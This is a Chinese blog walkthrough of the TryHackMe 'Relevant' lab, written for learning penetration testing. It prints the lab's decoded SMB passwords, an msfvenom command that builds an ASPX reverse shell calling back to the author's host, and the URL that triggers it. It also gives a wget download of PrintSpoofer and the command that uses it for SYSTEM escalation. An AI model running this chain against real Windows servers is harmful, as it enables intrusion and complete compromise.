首页 > 其他分享 >TryHackMe | Relevant Writeup

TryHackMe | Relevant Writeup

时间:2023-07-19 20:00:41浏览次数:56  
标签:49663 shell 提权 Writeup tcp 访问 Relevant aspx TryHackMe

TryHackMe | Relevant Writeup

信息收集

image-20230719164554036

有2个 Web 服务(80/tcp、49663/tcp)以及网络共享(445/tcp和 rdp的3389端口。

image-20230719164748445

有个nt4wrksv,连接看看

image-20230719164841464

有一个密码文件,打开是base64

image-20230719164915366

解码

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
 

想着拿密码先连接一波,直接就开始连接3389,好家伙,一个都不行

那就先看看80和49663端口吧,拿gobuster扫一下

 

发现了有个/nt4wksv目录,大胆推测这个就是我们共享文件的目录

image-20230719180104942

果然访问到了

所以我们的方向就很明确了,上传shell到nt4wksv,然后利用web访问激活反弹shell

首先生成一个反向shell,而且我们知道49663端口是IIS web服务,所以我们可以用aspx文件

.aspx是ASP.NET 页面的扩展名。它无非是在静态HTML网页里面嵌入了动态的指令(这些动态指令是由各种脚本语言编写的,是由IIS服务器上的脚本引擎来执行的)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.17.58.33 lport=1234 -f aspx -o shell.aspx

image-20230719184403598

然后再在共享文件处上传

image-20230719184534965

再我们网页端访问前先打开监听,然后再访问

image-20230719185112546

然后访问

http://10.10.94.191:49663/nt4wrksv/shell.aspx
 

然后就得到了shell,然后执行shell后就可先找user.txt

image-20230719185330341

提权

root.txt一定是需要最高权限的,所以我们需要提权

先看看令牌,检查我们的权限会发现我们被授予 SeImpersonatePrivilege

image-20230719194040901

搜索了一下,确实存在可以利用的漏洞,利用PrintSpoofer来提权

image-20230719194215589

下载工具

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

再利用文件共享上传到目标服务器上

image-20230719193910473

image-20230719194404335

再执行以下命令执行

PrintSpoofer64.exe -i -c cmd 
 

image-20230719194609922



标签:49663,shell,提权,Writeup,tcp,访问,Relevant,aspx,TryHackMe
From: https://www.cnblogs.com/l0vehzzz/p/17566591.html

相关文章

  • TryHackMe | Daily Bugle Writeup
    TryHackMe|DailyBugleWriteup信息收集:可以看到cms是Joomla,然后有一个administrator二级目录,然后开启了mysql服务使用joomscan针对目标站点进行扫描,joomscan是一个专门用于扫描JoomlaCMS的工具。joomscan-uhttp://10.10.184.75 可以看到版本是Joomla3.7.0,到expl......
  • TryHackMe | Skynet
    TryHackMe|Skynet信息收集nmap枚举,139/445端口开放,可知目标机开启了SMB服务dirsearch扫描Task1Deployandcompromisethevulnerablemachine!枚举SMB共享smbclient-L\\ip或者输入enum4linux-S$ip 密码那里直接按回车就行获取到一些可能能访问的SMB服......
  • TryHackMe | HackPark Writeup
    TryHackMe|HackParkWriteup可以用autorecon进行波信息收集,可以自动联动nmap和gobuster,但是扫的时间很久所以我就直接拿nmap扫了可以看到俩个开放端口803389Task1DeploythevulnerableWindowsmachine Whatsthenameoftheclowndisplayedonthehomepage?......
  • TryHackMe | Alfred Writeup
    TryHackMe|AlfredWriteupTask1InitialAccess1.1Howmanyportsareopen?nmap-sC-sV-AIP 明显3个开放端口1.2-Whatistheusernameandpasswordfortheloginpanel(intheformatusername:password)问我们登入的账号密码是啥研究了半天不知道密码......
  • TryHackMe | KenobiWriteup
    TryHackMe|KenobiWriteupTask1DeploythevulnerablemachineScanthemachinewithnmap,howmanyportsareopen?运行下nmap一眼就是7个Task2EnumeratingSambaforsharesSamba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使......
  • 2023Ciscn初赛WriteUp
    2023Ciscn初赛WriteUp基于国密SM2算法的密钥密文分发SM2密钥在线生成工具(const.net.cn)生成密钥,发送公钥allkey接口返回服务器端pubkey明文,privatekey密文以及randomString密文search接口可以直接拿到randomstring明文也就是C用C作为密钥用SM4_CBC解密privatekeyquantum......
  • 2023红明谷杯WriteUp
    2023红明谷WriteUpItTakesTwo!(赛后)比赛的时候脑瘫矩阵除的方向整错了,卡半天没出...最后没时间了#taskfromsage.allimport*fromCrypto.Util.numberimport*fromosimporturandomfromsecretimportflagn=16bound=2^15A=[ZZ.random_element(-bound,bo......
  • 第五届“强网杯”全国网络安全挑战赛-线上赛Writeup
    文章目录WEB[强网先锋]赌徒[强网先锋]寻宝MISC签到BlueTeamingISO1995CipherManEzTime问卷题WEB[强网先锋]赌徒目录扫描发现www.zip下载得到源码index.php<metacharset="utf-8"><?php//hintisinhint.phperror_reporting(1);classStart{public$name='guest';......
  • 2021数字中国创新大赛虎符网络安全赛-Writeup
    文章目录Web签到“慢慢做”管理系统Misc你会日志分析吗Web签到http://cn-sec.com/archives/313267.htmlUser-Agentt:zerodiumsystem("cat/flag");“慢慢做”管理系统根据题目提示,这里第一步登录应该利用一些字符串被md5($string,true)之后会形成如下,从而造成注入PSC:\Users\A......
  • 第十四届全国大学生信息安全竞赛-线上赛Writeup
    文章目录场景实操开场卷WEBeasy_sqleasy_sourceMISCtinytrafficrunning_pixel场景实操二阶卷WEBmiddle_sourceMISC隔空传话场景实操冲刺卷MISCrobot场景实操开场卷WEBeasy_sql有sql报错简单fuzz了一下发现过滤了union、information、column、inno等关键字。无表名,无列名注入......